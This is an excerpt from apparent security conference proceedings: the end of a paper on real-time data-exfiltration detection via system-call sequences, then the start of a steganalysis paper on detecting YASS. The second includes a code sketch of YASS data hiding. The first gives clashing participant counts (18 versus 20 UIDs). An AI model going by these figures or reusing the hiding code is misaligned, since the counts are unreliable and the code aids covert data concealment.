Figure 3: Three sequence collection methods (SEQ - windowing, VAR - variable, VARARG - variable<br />
with arguments) compared by number of unique sequences generated<br />
4. Evaluation<br />
We now evaluate the method described in the previous section against our three criteria for an ideal<br />
exfiltration detection agent.<br />
4.1 Tractable<br />
Perhaps the largest single challenge encountered during the implementation of this project was the<br />
task of collecting and managing the torrent of system calls that occur during normal to heavy use of a<br />
modern computer. Each user or process action can result in hundreds of system calls, and in our own<br />
experiments logging system call activity alone generated a gigabyte of data per hour. In previous work<br />
(Kang, 2005; Forrest, 2008) this problem is sidestepped mainly by concentrating on individual<br />
processes, users, or calls, and/or by using previously collected data.<br />
Unlike prior efforts, we are interested in tracing all system calls across multiple users to track their<br />
behavior in real time, and we also desire to deploy a swift analysis of that data without noticeably<br />
degrading system performance or destabilizing the system. While researching options for this we<br />
found an existing commercial solution that meets all of our needs.<br />
Dtrace (Dtrace, 2009) is a software tool designed specifically for low-impact system call tracing<br />
for system administration and debugging. More importantly, it can be configured to collect the<br />
required system call data, such as timestamps, user and process identifiers, executable names, error<br />
numbers, and executable arguments, with negligible effect on system performance.<br />
Another challenge is the management of the collected data. Retaining and cataloging all the system<br />
calls for analysis at a later time is impractical given the observed data rate of over 1 gigabyte per<br />
hour. As we previously discussed, by collecting just the unique sequences that form our profile of<br />
normal behavior in real time we elegantly address this problem.<br />
Figure 1 shows the increase in the number of unique system call sequences for the 1/java pair in an hour-long<br />
system call set using our variable sequence model. This pair was chosen because of the volume of<br />
system calls produced while the program was actually performing only a few functions<br />
repeatedly. Over the course of the approximately 1.4 million system calls generated by 1/java contained in<br />
the trace, only 196 unique sequences were recorded. It is this quick stabilization and small normal<br />
profile, combined with the advantages of Dtrace, that make our implementation lightweight, with very<br />
low observable impact on system performance.<br />
4.2 Environmentally neutral<br />
In order to validate that we can distinguish the normal profile of one user/process from another<br />
regardless of environmental conditions such as the operating system or other operational conditions,<br />
we must first explore a “diversity hypothesis” similar to that put forth by Forrest et al. in (Forrest<br />
2008). Their hypothesis states that the code paths executed by a process are highly dependent upon the<br />
usage patterns of the users, the configuration, and the environment, causing what is considered to be<br />
normal to differ widely from one installation to the next.<br />
While the sequence creation methods used by Forrest et al. are similar to ours, they focus solely on<br />
program execution; the same diversity should theoretically still exist between the profiles generated by<br />
our methods when per-user patterns are added as a controlling factor. In addition, it may also be<br />
possible to determine the degree of impact that changes such as different operating systems and varying<br />
users have upon a normal profile. We can observe this in our own testing by comparing the various<br />
collected profiles from different users and operating systems.<br />
Table 1: Comparison of normal profiles generated by different users by platform<br />
User 1B Linux (User1) Solaris (User1)<br />
User 1A 0.91129591 0.16700353 0.19755409<br />
User 1B 1 0.14119998 0.13764726<br />
User 2 0.25793254 0.13287113 0.12885861<br />
User 3 0.30644131 0.17470944 0.20602069<br />
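Match scores like those in Table 1 can be computed as the overlap between two profiles' sets of unique sequences. The paper does not state its exact similarity measure, so the asymmetric overlap ratio below is an assumption for illustration.

```python
def profile_overlap(profile_a, profile_b):
    """Fraction of profile_a's unique sequences also found in profile_b.

    Note the measure is asymmetric: comparing A against B need not give
    the same score as B against A, matching the row/column layout of a
    comparison table.
    """
    a, b = set(profile_a), set(profile_b)
    if not a:
        return 0.0
    return len(a & b) / len(a)
```

For example, two profiles sharing one of two sequences would score 0.5.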
For this testing we had three different users (User 1A, User 2, and User 3 in Table 1) run our variable<br />
sequence collection algorithm for approximately 1 hour. All users were using Mac OS X on separate<br />
machines. In addition, we had User 1 repeat the same collection process on a separate date using the<br />
Linux and Solaris operating systems on different machines, trying to keep behavior as similar as<br />
possible.<br />
The most significant result is that the profiles from User 1A and User 1B have a >90% match, while the<br />
profiles generated by the other two users did not exceed a 31% match when compared to User 1. This seems<br />
to confirm that there is significant variation between the profiles of different users.<br />
Perhaps the disappointment here is that the correlation between the User 1A and User 1B profiles was not<br />
closer to 100%. However, it should be noted that most of the difference between these two sets was the<br />
use of a new process in the User 1B profile that was not present in the User 1A profile. This type of<br />
anomaly will have to be handled in any future implementation.<br />
Differences in profiles among various users are, as expected, severe, with the most significant<br />
differences coming from different host operating systems. This is perhaps unsurprising, since many of<br />
the system calls used by Mac OS X are not used by Linux, and vice versa. The same goes for<br />
Solaris versus the others as well.<br />
However, this does indicate that any model will have to be highly adaptable to the environment and<br />
not rely on a predetermined set of signature detection algorithms. This property does, however, help us<br />
greatly, as mimicry attacks will be extremely difficult to carry out without specific knowledge of the<br />
environment and the user's behaviors.<br />
4.3 Responsive<br />
The last of the criteria for evaluating our chosen implementation is the ability to detect a very large<br />
variety of data exfiltrations. For this stage of testing we issued a challenge that was conducted over<br />
the course of two days at Oak Ridge National Laboratory (ORNL) during the summer of 2010.<br />
Participants were solicited from the lab to exfiltrate a number of files set up on one of our testing<br />
machines. All participants were asked to exfiltrate three files:<br />
- A plain text file, plainly labeled, in a directory to which all participants had unrestricted access.<br />
- A mock transactional database containing simulated sensitive personal financial information that<br />
was hidden within a shared location on the same machine.<br />
- A document that was clearly labeled and had a known location, but in a user directory with<br />
restricted access.<br />
While this data set will have a number of other uses in the future, it currently gives a good view of<br />
whether it is feasible to detect attacks in progress and an idea of what those attacks might<br />
look like. We had originally hoped that the attacks would display some specific similarities to each<br />
other, perhaps manifesting as an increase in certain system call types or some other type of pattern.<br />
However, we found that the attacks differed significantly, with a wide variety of tactics deployed.<br />
Even those attacks that appeared to use the same exfiltration tactics displayed very dissimilar<br />
system call sequence profiles.<br />
Overall, there were 18 individual UIDs and over 9 gigabytes of alerts observed during the two-day<br />
period. The size of the dataset collected, in contrast to the average observed rate of approximately 2<br />
megabytes of alerts generated under normal operation over the same time period, is evidence that our<br />
method is sufficiently sensitive to data exfiltration activities.<br />
Among the 20 observed UIDs, 8 were identifiable as successfully retrieving at least one of the files, and<br />
at least 2 retrieved all three. Observed behaviors included probing with find, privilege escalation<br />
attempts, mass data exfiltration using the sftp protocol, and transferring the files to a USB flash drive.<br />
The detection of many of these attacks may in some sense be biased, given that they were new users<br />
on the system using distinct UIDs. However, several of the attacks were observed under both the<br />
root account and the primary users’ UIDs, lending credibility to the system's ability to detect exfiltration<br />
behaviors even when the activity is hidden amongst normal system operation and users. As for the<br />
other attacks that were identified, each of these incidents invoked an alarm as designed, and for our<br />
immediate purposes this serves to validate that the implementation is working as intended.<br />
5. Conclusions<br />
The accurate detection of malicious data exfiltration is a complex task that can take human experts<br />
months. However, in order to react to an attack, a practical system not only needs to detect attacks<br />
autonomously, but must do so in real time, before files can be leaked.<br />
The goal of this paper was to identify and test ways to approach this problem. We initially identified<br />
the main issues that separate what we needed in our implementation from previous work<br />
on HIDSs. We sought a method that would be tractable to run in real time, environmentally neutral so<br />
as to perform well under any operating system or conditions, and, most importantly, responsive to behaviors<br />
specific to data exfiltration. With these criteria in mind we adapted a means of host-based detection<br />
using sequences of system calls to implement a data exfiltration detection agent.<br />
In all of our testing, we found that data exfiltration behaviors can be successfully detected in real time by the<br />
relatively simple means of system call sequence analysis, which can be implemented with<br />
negligible performance impact on user operations. Our adaptation of system call sequence monitoring<br />
to this specific problem is promising and passed our three main evaluation criteria. The<br />
implementation was successfully run in real time and deployed across a diverse set of systems and<br />
users. We were also able to present evidence that our method detects a wide range of<br />
exfiltration-related behaviors.<br />
This work has prompted the question of whether this approach can detect these malicious behaviors<br />
quickly and accurately enough to prevent the data exfiltration. Our future work will focus on correlating<br />
suspicious behaviors to more reliably discriminate malicious behaviors, and further testing of our<br />
methods against known attacks is warranted to determine long-term performance.<br />
Acknowledgements<br />
The views and conclusions contained in this document are those of the authors. This manuscript has<br />
been authored by UT-Battelle, LLC, under contract DE-AC05-00OR22725 with the U.S. Department<br />
of Energy. The United States Government retains and the publisher, by accepting the article for<br />
publication, acknowledges that the United States Government retains a non-exclusive, paid-up,<br />
irrevocable, world-wide license to publish or reproduce the published form of this manuscript, or allow<br />
others to do so, for United States Government purposes.<br />
References<br />
Axelsson, S. (2000) “The Base-Rate Fallacy and the Difficulty of Intrusion Detection.” ACM Transactions on<br />
Information and System Security, Vol. 3 No. 3, pp. 186-205.<br />
Cohen, W.W. (1995) Fast effective rule induction. In Machine Learning: the 12th International Conference.<br />
Morgan Kaufmann.<br />
Coleman, K.G. (2008) “Data Exfiltration.” [online], http://it.tmcnet.com/topics/it/articles/37876-data-exfiltration.htm.<br />
Dtrace (2009), [online], http://www.oracle.com/technetwork/systems/dtrace/dtrace/index.html.<br />
Endler, D. (1998) Intrusion detection: applying machine learning to Solaris audit data. In Proc. of the IEEE<br />
Annual Computer Security Applications Conference, pages 268–279. IEEE Computer Society Press.<br />
Fidelis Security Systems, (2009) “Fidelis Extrusion Prevention System”. [online], http://www.fidelissecurity.com/.<br />
Forrest, S. et al. (1996) A sense of self for UNIX processes. In Proceedings of the 1996 IEEE Symposium on<br />
Security and Privacy, pages 120–128, Los Alamitos, CA, IEEE Computer Society Press.<br />
Forrest, S. et al. (2008) “The Evolution of System-call Monitoring”, 2008 Annual Computer Security Applications<br />
Conference.<br />
Gao, D. et al. (2006) Behavioral distance measurement using hidden Markov models. In D. Zamboni and C.<br />
Kruegel, editors, Research Advances in Intrusion Detection, LNCS 4219, pages 19–40, Berlin Heidelberg,<br />
Springer-Verlag.<br />
Ghosh, A. and Schwartzbard, A. (1999) A study in using neural networks for anomaly and misuse detection. In<br />
Proceedings of the 8th USENIX Security Symposium.<br />
Giani, A. et al. (2004) “Data Exfiltration and Covert Channels.” In Proceedings of the SPIE 2004 Defense and<br />
Security Symposium.<br />
Hooper, E. (2009) “Intelligent Strategies for Secure Complex Systems Integration and Design, Effective Risk<br />
Management and Privacy.” In Proceedings of the 3rd Annual IEEE International Systems Conference.<br />
Kang, D. et al. (2005) “Learning Classifiers for Misuse and Anomaly Detection Using a Bag of System Calls<br />
Representation”, Proceedings of the 2005 Workshop on Information Assurance and Security, 2005.<br />
Kosoresow, A.P. and Hofmeyr, S.A. (1997) Intrusion detection via system call traces. IEEE Software, 14(5):35–<br />
42.<br />
Kymie, M.C.T. and Maxion, R. (2002) “‘Why 6?’ Defining the Operational Limits of stide, an Anomaly-Based<br />
Intrusion Detector.”<br />
Lee, W. et al. (1997) Learning patterns from UNIX process execution traces for intrusion detection. In AAAI<br />
Workshop on AI Approaches to Fraud Detection and Risk Management, pages 50–56. AAAI Press.<br />
Lee, W. and Stolfo, S.J. (1998) Data mining approaches for intrusion detection. In Proceedings of the 7th<br />
USENIX Security Symposium.<br />
Liao, Y. and Vemuri, V.R. (2002) Use of k-nearest neighbor classifier for intrusion detection. Computers &<br />
Security, 21(5):439–448.<br />
Liu, Y. et al. (2009) “SIDD: A Framework for Detecting Sensitive Data Exfiltration by an Insider Attack.” In<br />
Proceedings of the 42nd Hawaii International Conference on System Sciences, 2009.<br />
McAfee (2003), [online], http://www.mcafee.com/us/.<br />
Richardson, R. (2007) CSI Computer Crime and Security Survey, [online],<br />
http://icmpnet.com/v2.gocsi.com/pdf/CSISurvey2007.pdf.<br />
Sans Institute. (2010) “20 Critical Security Controls, Critical Control 15: Data Loss Prevention.” [online],<br />
http://www.sans.org/critical-security-controls/control.php?id=15<br />
Warrender, C. et al. (1999) "Detecting Intrusions Using System Calls: Alternative Data Models." In 1999 IEEE<br />
Symposium on Security and Privacy.<br />
Detection of YASS Using Calibration by Motion Estimation<br />
Kesav Kancherla and Srinivas Mukkamala<br />
(ICASA) / (Canes) / New Mexico Institute of Mining and Technology USA<br />
kancherla@cs.nmt.edu<br />
srinivas@cs.nmt.edu<br />
Abstract: In this paper we propose a new approach that addresses shortcomings of current blind steganalysis<br />
methods. “Yet Another Steganographic Scheme” (YASS) is a robust steganographic scheme that embeds data in<br />
random locations based on a secret key. Due to this randomization, current steganalysis schemes such as<br />
self-calibration methods do not detect YASS. In this work, we present a new calibration method using motion<br />
estimation and extract higher-order features. In our methodology, a motion estimation technique is applied to an<br />
image to estimate the original image. We assume that the estimated image captures the features of the original<br />
image, due to spatial redundancy in images. We extract two sets of features, DCT based features from the DCT<br />
domain and Markov model based features from the spatial domain, and apply Support Vector Machines (SVMs) to<br />
these feature sets. Our approach against YASS using different block sizes (9, 10, 12, and 14), compression rates<br />
(50/50, 50/75, and 75/75) and numbers of coefficients used for embedding data (12 and 19) obtained an accuracy of<br />
about 95%, even for bigger block sizes and low embedding rates. This methodology can be used as a blind<br />
steganalysis technique, as detection is based on the modification of an image rather than on a particular steganographic scheme.<br />
Keywords: blind steganalysis, Discrete Cosine Transform (DCT), motion estimation, steganalysis, Support<br />
Vector Machines (SVM)<br />
1. Introduction<br />
Steganography is the science of embedding data in a cover object for covert communication. The rapid<br />
growth of the internet and digital media poses an increasing threat of steganography being used for covert<br />
communication. Steganographic images are not perceptibly different to the human eye, but embedding data into<br />
images changes the statistics of the images. The goal of a steganalyst is to use these statistical changes<br />
to detect the presence of any hidden message.<br />
Fridrich used second order statistics in her research on the self-calibration method for blind steganalysis<br />
(Fridrich, 2004: 67-81). In the self-calibration technique, a given image is first decompressed and a few<br />
rows and columns are cropped. The cropped image is recompressed using the same quality factor,<br />
and the difference between the features extracted from the actual image and the cropped image is used to detect<br />
steganograms. To detect well-known steganographic schemes like Outguess, F5 and Model Based<br />
steganography (Provos, 2001: 24; Westfeld, 2001: 289-302; Sallee, 2005: 167-190), Farid<br />
proposed the use of wavelet based features for JPEG steganalysis (Lyu and Farid, 2002: 340-354),<br />
Shi proposed the use of a transition matrix as features for detecting steganograms (Shi et al, 2006: 249-<br />
264), Fridrich used merged Discrete Cosine Transform (DCT) and Markov features to implement<br />
multi-class JPEG steganalysis classification (Pevny and Fridrich, 2007: 1-13), and Chen proposed<br />
Markov based features using intra-block and inter-block correlation of DCT coefficients (Chen and<br />
Shi, 2008: 3029-3032).<br />
Outguess embeds data by replacing least significant bits and preserves first order statistics by<br />
performing additional changes; the F5 algorithm uses matrix embedding to reduce the number of changes<br />
needed to embed data; and Model-based steganography tries to preserve the histograms of individual<br />
AC DCT modes after embedding the data. Current steganalysis techniques can detect<br />
these steganography methods. “Yet Another Steganography Scheme” (YASS) by (Solanki, Sarkar<br />
and Manjunath, 2007: 16-31) is a newer steganography scheme that resists the above steganalysis<br />
methods. YASS embeds data at random locations and uses Quantization Index Modulation (QIM) to<br />
increase the robustness of the data. Even though it cannot be detected using current self-calibration<br />
methods, embedding data still changes the statistical properties of the image.<br />
In (Li, Shi and Huang, 2008: 139-148), the authors present a targeted attack on YASS. They showed<br />
that, due to the QIM embedding scheme used in YASS, there is an increase in the number of zero DCT<br />
coefficients in the stego image. Thus there is a notable difference between the statistics of an embedded block<br />
and an unmodified block. They also identified that the embedding locations are not random enough, which<br />
permits detection of YASS. However, this approach does not work when there are modifications to the algorithm. In the<br />
method proposed by (Kodovský, Pevný and Fridrich, 2010: 1-11), the authors used various well-<br />
known steganalysis methods for the detection of YASS. They used the Subtractive Pixel Adjacency Model<br />
(SPAM) feature set (686 features), the Pevný feature set (584 features), the Markov Process (MP) feature<br />
set (486 features) and the CDF (Cross-Domain Feature) set (1,234 features, a combination of SPAM and<br />
Pevný). Except for SPAM, the remaining features are extracted from the DCT domain (Pevny and Fridrich,<br />
2007: 1-13; Chen and Shi, 2008: 3029-3032; Pevny, Bas and Fridrich, 2009: 75-84). In the Pevný feature<br />
set, Cartesian calibration is used instead of difference calibration, thus increasing the feature set<br />
length; however, the authors argue that the use of difference calibration would affect the performance of<br />
detection. Our approach in this paper is based on difference calibration for detection.<br />
In this paper we propose a novel method that uses calibration for detection. YASS defeats current<br />
calibration methods by embedding data in random locations. In our approach, we perform calibration<br />
by estimating the image using motion estimation. Motion estimation is widely used in video compression<br />
to capture temporal redundancies; in our case we use motion estimation on adjacent blocks to<br />
capture spatial redundancies. After obtaining the estimated image we extract two sets of features:<br />
DCT based features and Markov based features (Pevny and Fridrich, 2007: 1-13). Markov based<br />
features are extracted from the spatial domain rather than the DCT domain, as embedding is done in the spatial<br />
domain. We used a Support Vector Machine (SVM) based classifier in our experiments, and obtained<br />
an accuracy of about 95% even for low embedding rates. This paper is organized as follows: Section 2<br />
gives a brief discussion of the YASS algorithm, Section 3 gives an outline of our approach, Section 4 gives<br />
a brief overview of the features used, and Section 5 contains the results obtained using this approach,<br />
followed by conclusions in Section 6.<br />
2. YASS algorithm<br />
For an input image of size MxN, the following steps are involved in YASS (Solanki, Sarkar and Manjunath, 2007: 16-31):
1. First the input image is divided into blocks of size BxB (B > 8, the block size in JPEG images), called big-blocks. Compressed images such as JPEGs are first decompressed and then divided.
2. From each big-block, an 8x8 block is pseudo-randomly selected. This block is called the embedding block. The key for the random number generator is shared between the sender and receiver.
3. To each embedding block we apply the two-dimensional DCT and divide the DCT coefficients by the quantization matrix of a design quality factor QFh. Data is embedded into a predetermined band of low-frequency AC coefficients using quantization index modulation.
4. After embedding the data, the embedding block is de-quantized using the design quality factor and the inverse two-dimensional DCT is applied.
5. After data is embedded in all the embedding blocks, the image is compressed with an advertised quality factor QFa. Generally QFh is not less than QFa.
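As a concrete illustration, the core of steps 2-4 can be sketched as follows. This is a simplified sketch under stated assumptions, not the authors' implementation: the quantization step, the coefficient band chosen for embedding, and the payload handling below are hypothetical placeholders.

```python
import numpy as np

def dct_matrix(n=8):
    # Orthonormal DCT-II basis matrix, so D @ block @ D.T is the 2-D DCT.
    m = np.array([[np.cos(np.pi * k * (2 * i + 1) / (2 * n))
                   for i in range(n)] for k in range(n)])
    m[0] *= np.sqrt(1.0 / n)
    m[1:] *= np.sqrt(2.0 / n)
    return m

D = dct_matrix()

def qim_embed(coeff, bit, step=2.0):
    # Quantization index modulation: move the coefficient to the nearest
    # even multiple of `step` for bit 0, odd multiple for bit 1.
    q = int(np.round(coeff / step))
    if q % 2 != bit:
        q += 1 if coeff / step >= q else -1
    return q * step

def yass_embed_block(big_block, bits, rng, step=2.0):
    # Step 2: pseudo-randomly place an 8x8 embedding block in the big-block.
    B = big_block.shape[0]
    r, c = rng.integers(0, B - 7), rng.integers(0, B - 7)
    block = big_block[r:r + 8, c:c + 8].astype(float)
    # Step 3: 2-D DCT, then QIM embedding in low-frequency AC positions
    # (this particular band is a hypothetical choice).
    coeffs = D @ block @ D.T
    band = [(0, 1), (1, 0), (1, 1), (2, 0)]
    for (i, j), bit in zip(band, bits):
        coeffs[i, j] = qim_embed(coeffs[i, j], bit, step)
    # Step 4: inverse 2-D DCT back to the spatial domain.
    big_block[r:r + 8, c:c + 8] = D.T @ coeffs @ D
    return big_block
```

The receiver only needs the shared seed to re-derive the block position, after which the same parity rule on the re-quantized coefficients recovers the bits.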
The random selection of embedding blocks in step 2 ensures security against current calibration-based steganalysis methods: as data is embedded in random 8x8 blocks, the steganalyst cannot resynchronize by cropping rows and columns. However, this scheme reduces the embedding capacity. Even though data is embedded at random locations, the statistical properties of the DCT coefficients still change.
Our approach tries to capture these changes by obtaining an estimated image from the actual image using spatial redundancies. This estimation process is similar to the motion estimation widely used in video compression techniques. After finding the estimate, we model the differences between the actual and estimated images along the horizontal, vertical, and diagonal directions as a one-step Markov process. We extract DCT and Markov features from both the actual and estimated images. After modeling and extracting features, we train an SVM-based classifier to detect steganograms.
3. Our approach<br />
The steganalysis scheme consists of three steps: (1) obtain an estimated image from the actual image, (2) extract high-order DCT and Markov features from both the actual and estimated images, and (3) train an SVM classifier using these features. In order to obtain the estimated image we use the concept of motion estimation (Torr and Zisserman, 1999: 278-294), widely used in video compression techniques. Motion estimation exploits temporal redundancies in videos to achieve compression.
The video compression process consists of inter-frame compression and intra-frame compression. Intra-frame compression is similar to JPEG compression. Inter-frame compression uses the temporal redundancy in the video frames: the current frame is predicted using redundant data from the previous frame. The current frame is divided into 8x8 blocks and a match for each block is sought in the previous frame, searching in the near vicinity of the block being analyzed.
Figure 1: The current block is searched for its best match in the search space and replaced by it
We apply this concept to images in order to find the estimate. Just as videos contain temporal redundancies, images contain spatial redundancies. We find the best match to the current block in its vicinity and replace the block with this match. Figure 1 shows the matching procedure, where the best match is found in the search space. To reduce the noise induced by motion estimation, we use a block size of 4x4.
The algorithm for estimating the image is given below:
1. First decompress the image by applying de-quantization and the inverse two-dimensional DCT
2. Divide the decompressed image into blocks of size 4x4
3. For each 4x4 block, find the best match using a step size of 1 pixel along both the x-axis and y-axis
4. Replace the actual block with the best match
5. After obtaining the matched blocks, apply the two-dimensional DCT and quantization to the estimated image
6. From this image, extract two sets of features: DCT-based and Markov-model-based features
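Steps 2-4 of this procedure amount to block matching. The sketch below is a minimal illustration; the search radius is our assumption, since the paper does not specify the extent of the vicinity searched.

```python
import numpy as np

def estimate_image(img, block=4, radius=4):
    # Replace each `block`x`block` tile with its best spatial match
    # (minimum sum of absolute differences), found within `radius`
    # pixels of the tile while scanning at 1-pixel steps.
    h, w = img.shape
    est = img.astype(float).copy()
    for r in range(0, h - block + 1, block):
        for c in range(0, w - block + 1, block):
            tile = img[r:r + block, c:c + block].astype(float)
            best, best_cost = tile, np.inf
            for dr in range(-radius, radius + 1):
                for dc in range(-radius, radius + 1):
                    if dr == 0 and dc == 0:
                        continue  # skip the tile's own position
                    rr, cc = r + dr, c + dc
                    if 0 <= rr <= h - block and 0 <= cc <= w - block:
                        cand = img[rr:rr + block, cc:cc + block].astype(float)
                        cost = np.abs(cand - tile).sum()
                        if cost < best_cost:
                            best, best_cost = cand, cost
            est[r:r + block, c:c + block] = best
    return est
```

Candidates are drawn from the original image, so every tile is estimated from its unmodified neighbourhood.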
4. Feature extraction<br />
In this section we briefly explain the feature extraction. We extract the merged DCT and Markov features (Pevny and Fridrich, 2007: 1-13) that are used for blind steganalysis. The first set of features consists of DCT-based features extracted using 23 different functionals, which are based on first-order and higher-order statistics of the quantized DCT coefficients. The second set of features is extracted from Markov-based models: the differences between absolute values of neighboring coefficients are modeled as a Markov process, and from these models we extract co-occurrence matrices. Due to the high dimensionality of these functionals, only features at selected locations and for selected values are taken. We extract a total of 274 features, of which 193 are DCT-based and 81 are Markov-based. The major difference between (Pevny and Fridrich, 2007: 1-13) and our features is that, instead of extracting the Markov-based features in the DCT domain, we extract them in the spatial domain only. As the embedding is done in the spatial domain, we believe Markov features extracted in the spatial domain are effective. A brief description of both sets of features is given below.
4.1 DCT features<br />
The coefficients are denoted d_ij(k), i, j = 1, ..., 8, k = 1, ..., nb, where d_ij(k) denotes the (i, j)-th quantized DCT coefficient in the k-th block (there are nb blocks in total).

The first feature is the histogram of the DCT coefficients of the image. To reduce dimensionality, we only use the histogram of the values from -5 to 5.

The next 5 functionals are histograms of the coefficients of 5 individual DCT modes (i, j) ∈ {(1, 2), (2, 1), (3, 1), (2, 2), (1, 3)}, where again only the histogram of the values {-5, ..., 5} is used:

    h^{ij} = (h^{ij}_L, ..., h^{ij}_R)                                      (1)

The next 11 functionals are dual histograms, represented by 8x8 matrices g^d_{ij}, where i, j = 1, ..., 8 and d = -5, ..., 5:

    g^d_{ij} = Σ_{k=1}^{nb} δ(d, d_ij(k))                                   (2)

where δ(x, y) = 1 if x = y and 0 otherwise. To reduce the number of features, only (i, j) ∈ {(2, 1), (3, 1), (4, 1), (1, 2), (2, 2), (3, 2), (1, 3), (2, 3), (1, 4)} are taken.

The next 6 functionals capture inter-block dependency among DCT coefficients. The first is the variation V:

    V = [ Σ_{i,j=1}^{8} Σ_{k=1}^{|I_r|-1} |d_ij(I_r(k)) - d_ij(I_r(k+1))|
        + Σ_{i,j=1}^{8} Σ_{k=1}^{|I_c|-1} |d_ij(I_c(k)) - d_ij(I_c(k+1))| ]
        / (|I_r| + |I_c|)                                                   (3)

where I_r and I_c denote the vectors of block indices 1, ..., nb while scanning the image by rows and by columns, respectively.

The next two functionals capture the blockiness:

    B_α = [ Σ_{i=1}^{⌊(M-1)/8⌋} Σ_{j=1}^{N} |c_{8i,j} - c_{8i+1,j}|^α
          + Σ_{j=1}^{⌊(N-1)/8⌋} Σ_{i=1}^{M} |c_{i,8j} - c_{i,8j+1}|^α ]
          / ( N⌊(M-1)/8⌋ + M⌊(N-1)/8⌋ )                                     (4)

where M and N are the image height and width in pixels, c_{i,j} are the grayscale values of the decompressed JPEG image, and α = 1, 2.

The last set of features consists of co-occurrence matrices of DCT coefficients in neighboring blocks. The co-occurrence matrix is calculated for the values -2 to +2.
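The first two kinds of functionals can be sketched as follows, computed from an array of quantized DCT blocks (the nb x 8 x 8 array layout is our assumption for illustration):

```python
import numpy as np

def global_histogram(dct_blocks, lo=-5, hi=5):
    # Histogram of all quantized DCT coefficients over the values lo..hi.
    vals = dct_blocks.ravel()
    return np.array([(vals == v).sum() for v in range(lo, hi + 1)])

def dual_histogram(dct_blocks, d):
    # Equation (2): for each mode (i, j), count the blocks whose
    # (i, j)-th coefficient equals d; returns an 8x8 matrix.
    return (dct_blocks == d).sum(axis=0)
```

In practice only the listed modes and value ranges are kept, which is what holds the merged feature set to 274 dimensions.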
4.2 Markov features<br />
From each image F(u, v), we obtain the following difference matrices along the horizontal, vertical, diagonal and minor-diagonal directions:

    F_h(u, v) = F(u, v) - F(u+1, v)
    F_v(u, v) = F(u, v) - F(u, v+1)
    F_d(u, v) = F(u, v) - F(u+1, v+1)
    F_m(u, v) = F(u+1, v) - F(u, v+1)

where F(u, v) is the image and (u, v) gives the pixel location.

In order to reduce the dimensionality, we consider only the values [-4, +4] in these matrices; all values larger than +4 are set to +4 and all values smaller than -4 are set to -4. From these matrices we calculate the transition matrices as follows:
    M_h(i, j) = Σ_{u=1}^{S_u-2} Σ_{v=1}^{S_v} δ(F_h(u, v) = i, F_h(u+1, v) = j)
              / Σ_{u=1}^{S_u-1} Σ_{v=1}^{S_v} δ(F_h(u, v) = i)              (5)

    M_v(i, j) = Σ_{u=1}^{S_u} Σ_{v=1}^{S_v-2} δ(F_v(u, v) = i, F_v(u, v+1) = j)
              / Σ_{u=1}^{S_u} Σ_{v=1}^{S_v-1} δ(F_v(u, v) = i)              (6)

    M_d(i, j) = Σ_{u=1}^{S_u-2} Σ_{v=1}^{S_v-2} δ(F_d(u, v) = i, F_d(u+1, v+1) = j)
              / Σ_{u=1}^{S_u-1} Σ_{v=1}^{S_v-1} δ(F_d(u, v) = i)            (7)

    M_m(i, j) = Σ_{u=1}^{S_u-2} Σ_{v=1}^{S_v-2} δ(F_m(u+1, v) = i, F_m(u, v+1) = j)
              / Σ_{u=1}^{S_u-1} Σ_{v=1}^{S_v-1} δ(F_m(u, v) = i)            (8)

where S_u and S_v are the dimensions of the image and δ(condition) = 1 if and only if the condition is satisfied. The final features are the average of the above 4 transition matrices.
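The difference matrices and averaged transition matrix can be sketched as follows. Note one simplification relative to equations (5)-(8): the normalisation below counts occurrences over the paired range only, a close but not identical denominator.

```python
import numpy as np

def transition_matrix(A, B, T=4):
    # Empirical transition probabilities P(B = j | A = i) for paired
    # difference values, clipped to [-T, T].
    A = np.clip(A, -T, T)
    B = np.clip(B, -T, T)
    M = np.zeros((2 * T + 1, 2 * T + 1))
    for i in range(-T, T + 1):
        mask = (A == i)
        denom = mask.sum()
        if denom:
            for j in range(-T, T + 1):
                M[i + T, j + T] = (mask & (B == j)).sum() / denom
    return M

def markov_features(img, T=4):
    img = img.astype(int)
    Fh = img[:-1, :] - img[1:, :]      # F(u,v) - F(u+1,v)
    Fv = img[:, :-1] - img[:, 1:]      # F(u,v) - F(u,v+1)
    Fd = img[:-1, :-1] - img[1:, 1:]   # F(u,v) - F(u+1,v+1)
    Fm = img[1:, :-1] - img[:-1, 1:]   # F(u+1,v) - F(u,v+1)
    mats = [transition_matrix(Fh[:-1, :], Fh[1:, :], T),     # eq (5)
            transition_matrix(Fv[:, :-1], Fv[:, 1:], T),     # eq (6)
            transition_matrix(Fd[:-1, :-1], Fd[1:, 1:], T),  # eq (7)
            transition_matrix(Fm[1:, :-1], Fm[:-1, 1:], T)]  # eq (8)
    # Final 81 features: the element-wise average of the 4 matrices.
    return sum(mats) / 4.0
```

With T = 4 each transition matrix is 9x9, and averaging the four directions yields the 81 Markov features used in the classifier.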
5. Results<br />
We used 2000 images in our experiment: 1400 images for training the SVM and 600 images for testing. Each data point consists of 274 features, of which 193 are DCT features and 81 are Markov features. We used the following parameters for embedding data using YASS:
- three different quality factor modes: 50/50, 50/75 and 75/75
- four different block sizes: 9, 10, 12 and 14
- number of low-frequency DCT coefficients used for embedding: 12 (low) and 19 (high)
We selected block sizes no larger than 14 because as the block size increases, the amount of data that can be embedded decreases. We chose 19 embedding coefficients because that value is used in the YASS paper (Solanki, Sarkar and Manjunath, 2007: 16-31), and 12 to show the performance of our steganalysis scheme at low embedding rates. Table 1 and Table 2 give the accuracies obtained for different parameters at the high and low data rates, respectively.
Table 1: Accuracy obtained for different block sizes and compression rates, with 19 coefficients used for embedding

    Advertised-Design QF \ Block size    9         10        12        14
    50-50                                99.8      99.7      99.75     99.7506
    50-75                                97.1737   97.584    97.5894   96.0881
    75-75                                97.5973   97.6725   97.0075   96.0881
Table 2: Accuracy obtained for different block sizes and compression rates, with 12 coefficients used for embedding

    Advertised-Design QF \ Block size    9         10        12        14
    50-50                                99.8337   99.5012   99.335    99.47
    50-75                                96.5087   96.7581   96.84     95.59
    75-75                                96.59     96.68     95.6775   94.55
We obtained an accuracy of about 99.5% for the 50-50 setting even when only 12 coefficients were used for embedding. Accuracy decreases as the block size increases for all compression settings, because as the size of the block increases, the embedding capacity decreases. We obtained an accuracy above 95% for all settings even when the block size is 14 and the number of embedding
coefficients is 12. Our method performed best with the 50-50 compression setting: more noise is added due to compression in this setting, and as our method exploits this noise for detection, we obtained better accuracy. In the next section we explain the model selection process and present Receiver Operating Characteristic (ROC) curves.
5.1 Model selection for SVMs<br />
